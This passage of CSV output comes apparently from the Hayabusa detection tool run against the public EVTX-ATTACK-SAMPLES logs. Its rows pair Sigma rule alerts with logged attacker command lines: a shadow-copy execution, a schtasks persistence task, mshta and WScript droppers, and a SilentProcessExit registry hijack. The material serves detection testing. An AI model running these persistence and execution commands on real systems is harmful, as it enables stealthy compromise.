: Path: C:\Windows\System32\wbem\WMIC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:45.405 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:45.491 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state : Path: C:\Windows\System32\wbem\WMIC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:47.402 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:47.478 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\"" : Path: C:\Windows\System32\wbem\WMIC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:47.478 +09:00,IEWIN7,1,medium,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:48.655 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:48.763 +09:00,IEWIN7,1,informational,Process Creation,"Command: vssadmin List Shadows : Path: C:\Windows\System32\vssadmin.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:48.827 +09:00,IEWIN7,1,informational,Process Creation,"Command: find ""Shadow Copy Volume"" : Path: C:\Windows\System32\find.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:54.447 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:54.544 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe : Path: C:\Windows\System32\wbem\WMIC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:54.544 +09:00,IEWIN7,1,medium,Suspicious WMI Execution,,rules/sigma/process_creation/win_susp_wmi_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:54.544 +09:00,IEWIN7,1,medium,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:54.632 +09:00,IEWIN7,1,informational,Process Creation,Command: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe : Path: \Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:59.519 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:59.578 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management : Command: C:\Windows\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" : Path: C:\Windows\System32\schtasks.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c %SYSTEMROOT%\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 11:13:52.171 +09:00,IEWIN7,1,informational,Process Creation,"Command: vshadow.exe -nw -exec=c:\windows\System32\osk.exe c:\ : Path: C:\ProgramData\vshadow.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-05-28 11:13:52.429 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Process Launched via DCOM : Command: DrvInst.exe ""1"" ""200"" ""STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot11"" """" """" ""6350c17eb"" ""00000000"" ""000005AC"" ""00000590"" : Path: C:\Windows\System32\drvinst.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-05-28 11:13:53.507 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: IEWIN7\IEUser : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-05-28 11:14:48.819 +09:00,IEWIN7,1,informational,Process Creation,"Command: vshadow.exe -nw -exec=c:\windows\System32\notepad.exe c:\ : Path: C:\ProgramData\vshadow.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-05-28 11:14:49.194 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Process Launched via DCOM : Command: DrvInst.exe ""1"" ""200"" ""STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot12"" """" """" ""6d110b0a3"" ""00000000"" ""000005B8"" ""000004B0"" : Path: C:\Windows\System32\drvinst.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-05-28 11:14:50.413 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\windows\System32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: IEWIN7\IEUser : Parent Command: vshadow.exe -nw -exec=c:\windows\System32\notepad.exe c:\",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-06-15 07:22:17.988 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Downloads\a.exe"" : Path: C:\Users\IEUser\Downloads\a.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:21.535 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Downloads\a.exe"" : Path: C:\Users\IEUser\Downloads\a.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\a.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:21.535 +09:00,IEWIN7,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:21.535 +09:00,IEWIN7,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:31.957 +09:00,IEWIN7,7,informational,WMI Modules Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:32.222 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"" /stext ""C:\Users\IEUser\AppData\Local\Temp\tmpA185.tmp"" : Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\a.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:47.253 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:55.441 +09:00,IEWIN7,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 00000040 : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:55.503 +09:00,IEWIN7,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 00000040 ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:55.566 +09:00,IEWIN7,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 00000040 ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:55.707 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:06.691 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} : Path: C:\Windows\System32\dllhost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:07.019 +09:00,IEWIN7,1,informational,Process Creation,Command: efsui.exe /efs /keybackup : Path: C:\Windows\System32\efsui.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\lsass.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:07.082 +09:00,IEWIN7,1,informational,Process Creation,Command: atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: IEWIN7\IEUser : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:13.894 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe : Path: C:\Windows\System32\userinit.exe : User: IEWIN7\IEUser : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:13.957 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" : Path: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\userinit.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:13.957 +09:00,IEWIN7,1,high,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation/sysmon_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:13.957 +09:00,IEWIN7,1,medium,Suspicious Userinit Child Process,,rules/sigma/process_creation/win_susp_userinit_child.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:13.972 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE : Path: C:\Windows\explorer.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:15.054 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\VBoxTray.exe"" : Path: C:\Windows\System32\VBoxTray.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:16.592 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" : Path: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:23.405 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:26.811 +09:00,IEWIN7,7,informational,WMI Modules Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:26.999 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"" /stext ""C:\Users\IEUser\AppData\Local\Temp\tmp7792.tmp"" : Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:53.358 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} : Path: C:\Windows\System32\dllhost.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 16:13:42.294 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\mshta.exe"" ""C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta"" : Path: C:\Windows\System32\mshta.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\update.html",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:14:32.809 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} : Path: C:\Windows\System32\dllhost.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:21:50.488 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html : Path: C:\Program Files\Internet Explorer\iexplore.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:21:51.035 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" SCODEF:540 CREDAT:275457 /prefetch:2 : Path: C:\Program Files\Internet Explorer\iexplore.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:22:05.691 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WScript.exe"" ""C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\updatevbs.vbs"" : Path: C:\Windows\System32\wscript.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:22:05.691 +09:00,IEWIN7,1,high,WScript or CScript Dropper,,rules/sigma/process_creation/win_malware_script_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:22:05.691 +09:00,IEWIN7,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-20 02:22:37.897 +09:00,IEWIN7,1,informational,Process Creation,"Command: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe"" /v GlobalFlag /t REG_DWORD /d 512 : Path: C:\Windows\System32\reg.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:41.709 +09:00,IEWIN7,1,informational,Process Creation,"Command: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe"" /v ReportingMode /t REG_DWORD /d 1 : Path: C:\Windows\System32\reg.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:41.709 +09:00,IEWIN7,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:41.709 +09:00,IEWIN7,13,critical,Registry Persistence Mechanisms,,rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:41.709 +09:00,IEWIN7,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:43.944 +09:00,IEWIN7,1,informational,Process Creation,"Command: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe"" /v MonitorProcess /d ""C:\windows\temp\evil.exe"" : Path: C:\Windows\System32\reg.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:43.944 +09:00,IEWIN7,13,critical,Registry Persistence Mechanisms,,rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:45.694 +09:00,IEWIN7,13,critical,Registry Persistence 